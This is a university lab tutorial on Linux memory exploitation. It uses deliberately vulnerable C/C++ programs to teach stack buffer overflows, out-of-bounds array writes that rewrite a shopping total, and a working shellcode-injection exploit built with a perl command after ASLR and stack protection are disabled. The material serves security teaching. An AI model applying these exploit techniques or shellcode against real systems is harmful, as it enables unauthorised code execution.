Introduction to Basic Exploits

Authors: Rich Macfarlane, Gordon Russell

This gives an essential introduction to understanding basic Linux exploits, such as buffer overflows, missing range checks, and stack corruption. We will use some basic vulnerable C and C++ programs to explore memory management exploits. It also includes a short tutorial on shellcode injection. This is all done within Kali, using gcc/g++ and gdb, the Linux debugger.

Question 1: Basic C Program, GDB Debugger and Stack Memory Analysis

Create a file "overflow.c" in "/root" and add the following basic program code into the file:

#include <stdio.h>
#include <string.h>

int main() {
 // 5 byte buffer, which is 4 characters plus the null terminator
 char buff[5];

 // Copy 5 bytes to string buff
 strcpy(buff,"Rich"); 

 // print the string
 printf ("Hello %s\n",buff);
}

Compile this vulnerable C program with the gcc compiler:

gcc overflow.c -o overflow -g -fno-stack-protector -zexecstack -Wno-stringop-overflow
In order to make life simple, this compiles the code with the debugger enabled, and switches off some of the compiler memory security features which would otherwise make the example much more complex to perform.

The program "overflow" is then ready for executing. To make the program memory easier to analyse consistently in the debugger, switch the stack memory randomization protection off.

echo "0" > /proc/sys/kernel/randomize_va_space

Try running our overflow program normally.

./overflow

Run the executable using the gdb debugger

gdb overflow
Use the "list" command to see the code. When you do this you only see the first few lines of the file. To see the next lines press "return" (pressing return on a blank line actually runs the last command you tried again, e.g. "list").

As you can see, the main (and only) routine here is called "main". Disassemble the routine "main" (i.e. show the assembly code for this routine).

(gdb) disassemble main

This shows the code in a format like:

   0x0000000000400523 <+23>:    mov    %rax,%rsi
   0x0000000000400526 <+26>:    mov    $0x4005ec,%edi
   0x000000000040052b <+31>:    mov    $0x0,%eax
   0x0000000000400530 <+36>:    callq  0x4003e0 <printf@plt>
   0x0000000000400535 <+41>:    leaveq
   0x0000000000400536 <+42>:    retq
Ignoring the "0x000...:" part, what is the first instruction of "main"? In the case of the example above, it would be "mov %rax,%rsi". Do not include any unneeded spaces. First instruction:

While still in the debugger, list the program again. To start listing again from line 1 you may need the command "list 1".

Find the line with 'strcpy(buff,"Rich");', and set a breakpoint on that line. The command is "break" followed by the line number.

Now run the program using "run" in the debugger, and it should automatically stop running at the breakpoint. Once this is done try:

print buff
This should show you the contents of "buff", which contains random data as it has never been initialised. The address where "buff" lives in memory can be found by putting an ampersand in front of the variable:
print &buff
Execute the "strcpy" line using the command "next", which steps on to the next command (the printf). Now repeat the "print buff" command. It should now have the value "Rich".

Further investigate at this point using the following commands:

info reg rbp rsp
info frame
The stack frame holds the return address (a saved instruction pointer) of the code which called the current function "main". It is listed under "Saved registers" (the register values saved onto the current stack frame), and is called "rip". The "info frame" output shows the stack address at which it is saved. The "buff" variable is also on the stack, as you discovered with the "print" command above.

Subtract the address of buff from the address where the saved RIP is stored on the current stack frame ("rip at"). As these addresses are in hex, you may want to use another terminal window and the Python interpreter. How many bytes are there between the two addresses (answer in decimal)?
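
The subtraction can be done in the Python interpreter. The following is a minimal sketch only: both addresses are made-up placeholders and the function name is hypothetical, so substitute the values gdb reports for "print &buff" and "rip at".

```python
# Hypothetical addresses; replace them with the values reported by gdb.
buff_addr = 0x7fffffffe0cb   # from "print &buff"
rip_at = 0x7fffffffe0d8      # from "info frame", the "rip at" value


def byte_distance(saved_rip_addr, buffer_addr):
    """Number of bytes from the start of the buffer to the saved RIP slot."""
    return saved_rip_addr - buffer_addr


# Python prints integers in decimal by default, which is the format asked for.
print(byte_distance(rip_at, buff_addr))
```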

Question 2: Stack Buffer Overflow

Now that we fully understand our basic program, the gdb debugger, and the stack frame memory of our main function, we can look at exploiting the vulnerable code, using a buffer overflow of the buff variable to overwrite the saved RIP. Copy "overflow.c" to "overflow2.c". In "overflow2.c" change the string "Rich" to a long string made of "A" characters. Start with the number of "A" characters being 4 plus the difference between the addresses you calculated in the previous question. So, if the difference was 10, you need 14 "A" characters, e.g.

  strcpy(buff,"AAAAAAAAAAAAAA");
This should cause a buffer overflow in which the strcpy overwrites the 4 low bytes of the saved RIP with ASCII "A" characters. It will also overwrite the next byte with 0x0, as the null at the end of the null-terminated string is also copied.

Once the changes are made, compile this code as before, except make the output "overflow2". Run the code. What error do you get?

Just write the error in lower case, and only include the error. So

zsh: divide by zero      ./overflow2
is simply "divide by zero".

Error:

Use the debugger on overflow2. Set a breakpoint on the strcpy command. Run the code. Once at the breakpoint, do

  info frame
Note the current value of the "saved rip". Now use "next", then repeat the "info frame". What has happened to the "saved rip"?

Saved RIP, least significant 5 bytes:
So if the saved rip is 0x7f1122334455, the answer is 1122334455.

This is the end of the string, written backwards, where the hex of ASCII A appears 4 times, then the null.
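
To see why the string appears "backwards", the overwrite can be modelled in Python. This is only a sketch of the byte layout, not of the real process: the helper name is hypothetical, and the starting value is the 0x7f1122334455 example used above rather than anything you will see in gdb.

```python
import struct


def overwrite_low_bytes(saved_rip, data):
    """Overwrite the lowest-addressed bytes of an 8-byte little-endian value.

    data must be at most 8 bytes long.
    """
    raw = bytearray(struct.pack("<Q", saved_rip))  # lowest byte is stored first
    raw[:len(data)] = data
    return struct.unpack("<Q", bytes(raw))[0]


original = 0x7f1122334455   # example value from the text above
tail = b"AAAA\x00"          # the last four "A"s of the string plus its null
print(hex(overwrite_low_bytes(original, tail)))  # 0x7f0041414141
```

Because x86-64 stores the least significant byte at the lowest address, the first character copied lands in the lowest byte of the value, and the trailing null lands in the fifth byte.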

Question 3: Buffer Overflow - Stack Frame Memory Manipulation

Create a file "test1.cc" and put the following program into the file:

#include <stdio.h>
#include <stdlib.h>

int main(int argc,char **argv) {
 if (argc < 3) {
    printf ("Not enough parameters: enter item discount\n");
    exit(1);
 }
 int total=0;
 int items[4] = { 10,15,17,22 };
 int item=atoi(argv[1]);
 int discount=atoi(argv[2]);
 items[item]-=discount;
 for (int i=0; i<4; i++) {
   if (items[i] < 0) items[i] = 0;
   printf ("Charge id: %d, price %d\n",i,items[i]);
   total+=items[i];
 }
 printf ("Total: %d\n",total);
}

Compile this program with

g++ -g test1.cc

This represents a super simple example of a shopping basket with 4 items, where "items" holds the price of each of the 4 items in the basket. This code will calculate the total shopping basket price. But with this basket each customer is allowed a discount on one item in their basket, and that discount is allowed to be any value. OK it is not that realistic, but we need to keep the code simple.

The code takes 2 parameters. Parameter 1 is the index of the item to get the discount, and parameter 2 is the discount to be applied. It then adds up the total. So "./a.out 1 0" gives a 0 discount to item 1, "./a.out 1 5" gives a 5 pound discount to item 1, and "./a.out 3 10" gives a 10 pound discount to item 3.

The code has some safety protection. For instance, "a.out 0 0" would give:

Charge id: 0, price 10
Charge id: 1, price 15
Charge id: 2, price 17
Charge id: 3, price 22
Total: 64
However "a.out 0 20" does not give id:0 for "-10" pounds. There is a safety check that forces all prices to be a minimum of zero.

If you were trying to get the best possible price by running this program, what is the lowest total you can get using one of the parameter pairs "0 100", "1 100", "2 100", or "3 100"?
Best price?:

Note that there is no bounds check to make sure the first parameter is between 0 and 3. If you were to use a larger index, the program would exceed the limits of the array "items" and start to write to memory between the array's address and the top of the stack: an overflow of the items buffer. This would effectively allow us to corrupt the stack frame and the contents of adjacent function data, and we can use this to change things we should not be able to change...

  • Run gdb (the debugger) on a.out, e.g. "gdb a.out".
  • Using "list" in gdb, find the line number of the line "items[item]-=discount".
  • Use that in "break lineno", so if the line is 15 do "break 15".
  • Type "run 0 0" (run a.out in gdb with parameters 0 0).
  • It should stop at the breakpoint on the line you identified earlier.
  • Do "print &items" (the address of items in memory).
  • Do "print &total" (the address of total in memory).
  • Subtract the address of items from the address of total.

Bytes between variables:

Given that "items" is made up of 4 byte integers, each +1 to the index will increase the address by 4. What index of items would therefore refer to the contents of "total"?

Index of items for the contents of "total":
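
The byte-offset-to-index conversion described above can be sketched in Python. The addresses below are placeholders chosen for illustration, and the helper name is hypothetical; use the values from "print &items" and "print &total" instead.

```python
INT_SIZE = 4  # bytes per int, as stated above


def index_for_offset(byte_offset, element_size=INT_SIZE):
    """Array index whose element starts byte_offset bytes past element 0."""
    if byte_offset % element_size != 0:
        raise ValueError("offset is not aligned to an element boundary")
    return byte_offset // element_size


# Hypothetical addresses, not measured values.
items_addr = 0x7fffffffe0b0
total_addr = 0x7fffffffe0c8
print(index_for_offset(total_addr - items_addr))
```

If "total" happens to sit at a lower address than "items" on your system, the offset and therefore the index come out negative, which C will accept just as readily as an index that is too large.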

Use this knowledge and run "a.out" with the first parameter being the index identified above, and the second parameter being a number which when subtracted from the running total would result in the total calculated price being 0.

What were the parameters of a.out to get a total of zero?
Parameter 1:
Parameter 2:

Question 4: Buffer Overflow - More Memory Manipulation

Create a file "test2.cc" and save the following source code into the file.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char **argv) {
  if (argc < 2) {
    printf ("Not enough parameters: enter your reference code\n");
    printf ("Maximum of 7 characters in your code\n");
    exit(1);
  }
  int basket=550;
  char code[8];
  strcpy(code,argv[1]);
  printf ("Your ref: %s. The bill is %d\n",code,basket);
}
This program replicates the internals of a site which finalises your shopping cart bill. It is called with a user-defined reference which will appear on the bill, along with the basket total of 550 pounds.

Compile the program as before, and try running this new a.out with a user-defined reference, such as "rich21".

The user ref is only designed to have a max of 7 characters (plus a null character). If too much is stored in the code array it will overflow and end up overwriting the value of basket.

Slowly try increasing the size of the user reference parameter of a.out. For instance, try

./a.out gordx
./a.out gordxx
and so on.

At what length of string does the string start to interfere with the value of the basket? Remember there is a NULL at the end of the string when it is encoded into the computer, so add 1 to the string length you see.
overrun:

When the string only just overflows into the basket variable, the variable's least significant byte is changed from its current value to that of the NULL character (hex 0x00). The current value 0x226 has 0x26 in its least significant byte and 0x02 in the next byte up. Writing 0x00 over the least significant byte leaves 0x200, or 512 decimal.
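
The arithmetic above can be checked with a short Python sketch. It assumes a 4-byte little-endian int, as on x86-64 Linux, and the helper name is hypothetical.

```python
import struct


def clobber_low_byte(value, new_byte):
    """Replace the least significant byte of a 4-byte little-endian int."""
    raw = bytearray(struct.pack("<i", value))  # 550 is stored as 26 02 00 00
    raw[0] = new_byte                          # the lowest address holds the low byte
    return struct.unpack("<i", bytes(raw))[0]


basket = 550  # 0x226
print(hex(basket), "->", hex(clobber_low_byte(basket, 0x00)))  # 0x226 -> 0x200
```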

Use this knowledge to find the shortest string possible which sets your bill when running a.out to be 55 pounds only.

In doing this you need to try different parameters for the user reference. Limit yourself to using either "x" where the character makes no difference to the price, or the actual character required to make the bill 55 pounds. An ASCII chart might help...
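
Instead of an ASCII chart, Python can show which characters produce a given integer. The sketch below is only a helper for exploring: the function name is hypothetical, the example value was chosen for illustration and is not one of the answers, and it assumes a 4-byte little-endian int.

```python
def chars_for_value(value):
    """Little-endian bytes of a 4-byte int, with trailing zero bytes removed."""
    raw = value.to_bytes(4, "little")
    return raw.rstrip(b"\x00")


# Illustrative value only: 0x4141 is two bytes of 0x41, the ASCII code for "A".
print(chars_for_value(0x4141))  # b'AA'
```

The string's own terminating null supplies the zero byte that follows the last character, which is why the trailing zero bytes do not need to be typed.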

What is the user reference needed?
ref:

If you wanted to set the basket to 12627 pounds, what would you need to use as the reference? Again use "x" where it makes no difference, and the appropriate other characters to get to 12627. Use the minimum number of characters to do this.

What is the user reference needed?
ref:

Question 5: Buffer Overflow Exploit with a Payload

In this set of questions we are going to create a buffer overflow exploit, including redirection to run some basic payload code. Example adapted from https://www.soldierx.com/tutorials/Stack-Smashing-Modern-Linux-System

Create a trivial program vulnerable.c:

#include <string.h>
#include <stdio.h>

void go(char *data) {
    char name[64];
    printf("target: %p\n", name);  // Print address of buffer.
    strcpy(name, data);
}

int main(int argc, char **argv) {
    go(argv[1]);
}
All this does is take a parameter from the command line and copy it to a variable "name". It is again vulnerable code, which we can take advantage of via an overflow of the buffer. To make life easier, the program also prints the address of the buffer. In real life you might have to do a range of other things to work this out.

Compile the program with

gcc vulnerable.c -zexecstack -fno-stack-protector -g
Run the program several times with the same name as the input parameter:

./a.out rich

You should see the address of our name buffer change each time. This is due to the default Linux stack memory randomisation. For our experimentation we can switch this off:

echo "0" > /proc/sys/kernel/randomize_va_space
This switches off the default ASLR protection in Linux. It is much harder to create a stable exploit with randomised stack memory allocation... Run the program again to check the address of our name buffer is now stable.

Check the Program is Vulnerable

To check for a buffer overflow vulnerability in the code, we can experiment with sending large inputs to the program. Try sending 40, 60, and 80 "A"s instead of "rich" as the parameter.

./a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
./a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
./a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

As expected, the "name" buffer was overflowed, and it seems that our saved RIP (the return instruction pointer) was too! Our exploit seems possible.

Identify Location of Saved RIP on Stack Frame

To create our buffer overflow exploit, we first need to locate the return Instruction Pointer in our current Stack Frame, the Saved RIP of the calling function. We could do this by experimenting with our "A"s, or using unique strings, but as we have access to the code, we will use our previous method with the debugger and analysis of the stack memory.

Run a.out with the gdb debugger, use "list" to find the line with the vulnerable "strcpy" function on it, and set a breakpoint on that line. Now "run rich" (run the program with argv[1] set to "rich"). Find the address of "name" (the buffer we are going to overflow) and the address of the "rip" saved instruction pointer for the calling function, using your now familiar gdb commands. Using the previous method, calculate the number of bytes between the "name" buffer and the return instruction pointer. What is that offset in decimal?
Bytes to saved instruction pointer:

To gain control of the program we now need to use our buffer overflow to overwrite the saved RIP with the address of some payload code. We have a small payload of only 45 bytes, so we can inject that into the "name" buffer. If we then pad this input up to the saved RIP, and overwrite it with the address of the buffer, we should be able to redirect execution to our payload code.

To create a working exploit we need to run the program in as similar a way as possible to when we actually add the exploit payload. The payload itself is 45 bytes long, but we will need to pad this out to the byte length between name and the return address on the stack (the distance we found earlier). The address we will use to overwrite the current return address is 6 bytes long, so 6 plus the number of bytes from the name buffer to the saved RIP gives the total number of bytes we need to generate to precisely overwrite our saved RIP.
Total number of chars/bytes in our buffer we need to create:
Number of chars/bytes in our buffer we need to pad between the payload and our new return address:
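
The two sizes asked for above follow from simple arithmetic, sketched here in Python. The function name is hypothetical and the offset of 100 is a placeholder, not a measured value; use the offset you found with gdb.

```python
PAYLOAD_LEN = 45  # payload size given above
ADDRESS_LEN = 6   # bytes of the return address that get written


def buffer_sizes(offset_to_saved_rip):
    """Return (total_bytes, padding_bytes) for a given buffer-to-RIP offset."""
    total = offset_to_saved_rip + ADDRESS_LEN
    padding = offset_to_saved_rip - PAYLOAD_LEN
    return total, padding


# 100 is a placeholder offset used only to show the calculation.
print(buffer_sizes(100))  # (106, 55)
```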

Build our Exploit Buffer

We need to now build our exploit buffer, which will contain the payload code, some padding to get to the Saved RIP location, and then our address of the payload code.
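
The layout just described (payload, then padding, then address) can be sketched in Python to check lengths before building the real thing. Everything here is a stand-in: the helper name is hypothetical, the payload is 45 filler bytes rather than the real shellcode, the address is all 0xff, and 100 is a placeholder offset.

```python
def build_exploit_buffer(payload, offset_to_saved_rip, return_address):
    """Concatenate the payload, "A" padding, and the little-endian address."""
    if len(payload) > offset_to_saved_rip:
        raise ValueError("payload does not fit before the saved RIP")
    padding = b"A" * (offset_to_saved_rip - len(payload))
    return payload + padding + return_address


# Placeholder inputs, used only to check the layout.
fake_payload = b"\x90" * 45                 # stands in for the 45-byte payload
fake_address = b"\xff\xff\xff\xff\xff\xff"  # stands in for the real address
buf = build_exploit_buffer(fake_payload, 100, fake_address)
print(len(buf))  # 106
```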

We can use perl to help us create the program input parameter used to overflow the name buffer. The following command will print 60 "A"s to standard output:

perl -e 'print "A"x60'

Try running our program, using perl to create the program input parameter "Rich":

./a.out `perl -e 'print "Rich"'` 

Now, let's run the program with the same size of buffer we will need to overwrite the saved RIP, and identify the address of the name buffer under those conditions. Remember, the code prints this out when it runs, to make our exploit writing easier... We can just use "A"s for the buffer for now. Run the program and send in the 78 byte buffer, using the following:

env - ./a.out `perl -e 'print "A"x78'`
This runs the executable without any environment variables. These are variables which describe the execution environment, such as PATH. They can change over time and, as they are stored on the stack, they can shift the stack addresses. Without "env -", small changes in the way you execute the program can change the address and cause the exploit to fail.
Name buffer address:

Rewrite that address into little endian, and put "\x" in front of each byte. So if you had 0x7fffffff1130, it would become \x30\x11\xff\xff\xff\x7f.
little endian target address:
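
The little endian rewrite can be done by hand, or checked with a short Python sketch like the one below. The function name is hypothetical, and the address is the example value from the text, not your own buffer address.

```python
def little_endian_escape(address, length=6):
    """Format an address as \\xNN escapes, least significant byte first."""
    raw = address.to_bytes(length, "little")
    return "".join("\\x{:02x}".format(b) for b in raw)


# Example address from the text above.
print(little_endian_escape(0x7fffffff1130))  # \x30\x11\xff\xff\xff\x7f
```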

Now let's build our exploit buffer, adding the payload code, the padding, and our new return address. The return address should point at the name buffer and our exploit payload. Change the return address \xff\xff\xff\xff\xff\xff at the end of the string to your little endian name buffer address calculated in the previous question.

env - ./a.out `perl -e 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2"
 . "\x48\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83"
 . "\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21"
 . "A"x27 . "\xff\xff\xff\xff\xff\xff"'`
If the exploit succeeds and the payload runs, it prints a short message beginning with "H". If the exploit fails, the stack addresses may have changed. This can happen because the parameter itself is pushed onto the stack before main runs. If so, look in the output for "target:" again, and create your exploit buffer again using the new address.
printf ("H......");
What message gets printed by the payload (case, punctuation, and space sensitive)?
message:

Analyse our Exploit Payload

Use gdb to run our program with the successful exploit buffer, and let's analyse it from the debugger. We can run with the perl-generated input parameter by using "gdb --args" in place of the "env -" used previously.

Use "list" and again set the breakpoint at the strcpy. Then just type "run". You might get a little screen corruption as the payload code is binary, but just hit return.

The payload is in the "data" parameter, which should be displayed. If not use "print data" to display the address and contents.

Disassemble the first 16 instructions of the shellcode. Use "x/16i data". What is the first instruction opcode?
Opcode 1:
Now use "x /45bx data" and "x /45bc data" to view the shellcode as hex and then as ASCII characters. How many bytes into the payload does the string which gets printed when this shellcode runs start? Format it as a decimal number. You can confirm your own number by trying "x /5c data+10", where 10 is replaced with what you think the right answer is. If you can see the string starting there then you are right! You can reconfirm this using "x /1s data+10", which prints the first null-terminated string it finds. Again replace 10 with the right answer.
String offset:

Review the stack frame information with "info frame". Print out the stack frame memory from the name buffer up to and including the Saved RIP (the size of your exploit buffer) using the x command to show the memory in Hex and then ASCII.

Then run our program's next instruction, review the stack frame again, and again review the 78 bytes of stack memory starting at the name buffer. You should be able to identify our payload, the padding with "A"s, and the saved RIP overwritten with our payload address.

Can you identify the Hex bytes which make up the message printed by our payload? Enter just the hex pairs, without the "0x" before. If the message was 'rich' the Hex would be "72696368".
Hex bytes of message:
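
The answer format can be checked in Python. This sketch converts the 'rich' example from the text to its hex pairs; the function name is hypothetical.

```python
def ascii_to_hex(text):
    """Hex pairs for each ASCII character, with no "0x" prefix or separators."""
    return text.encode("ascii").hex()


print(ascii_to_hex("rich"))  # 72696368
```

Going the other way, bytes.fromhex("72696368") gives back b'rich', which is a quick way to check hex pairs read out of gdb.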

Linuxzoo created by Gordon Russell.
@ Copyright 2004-2024 Edinburgh Napier University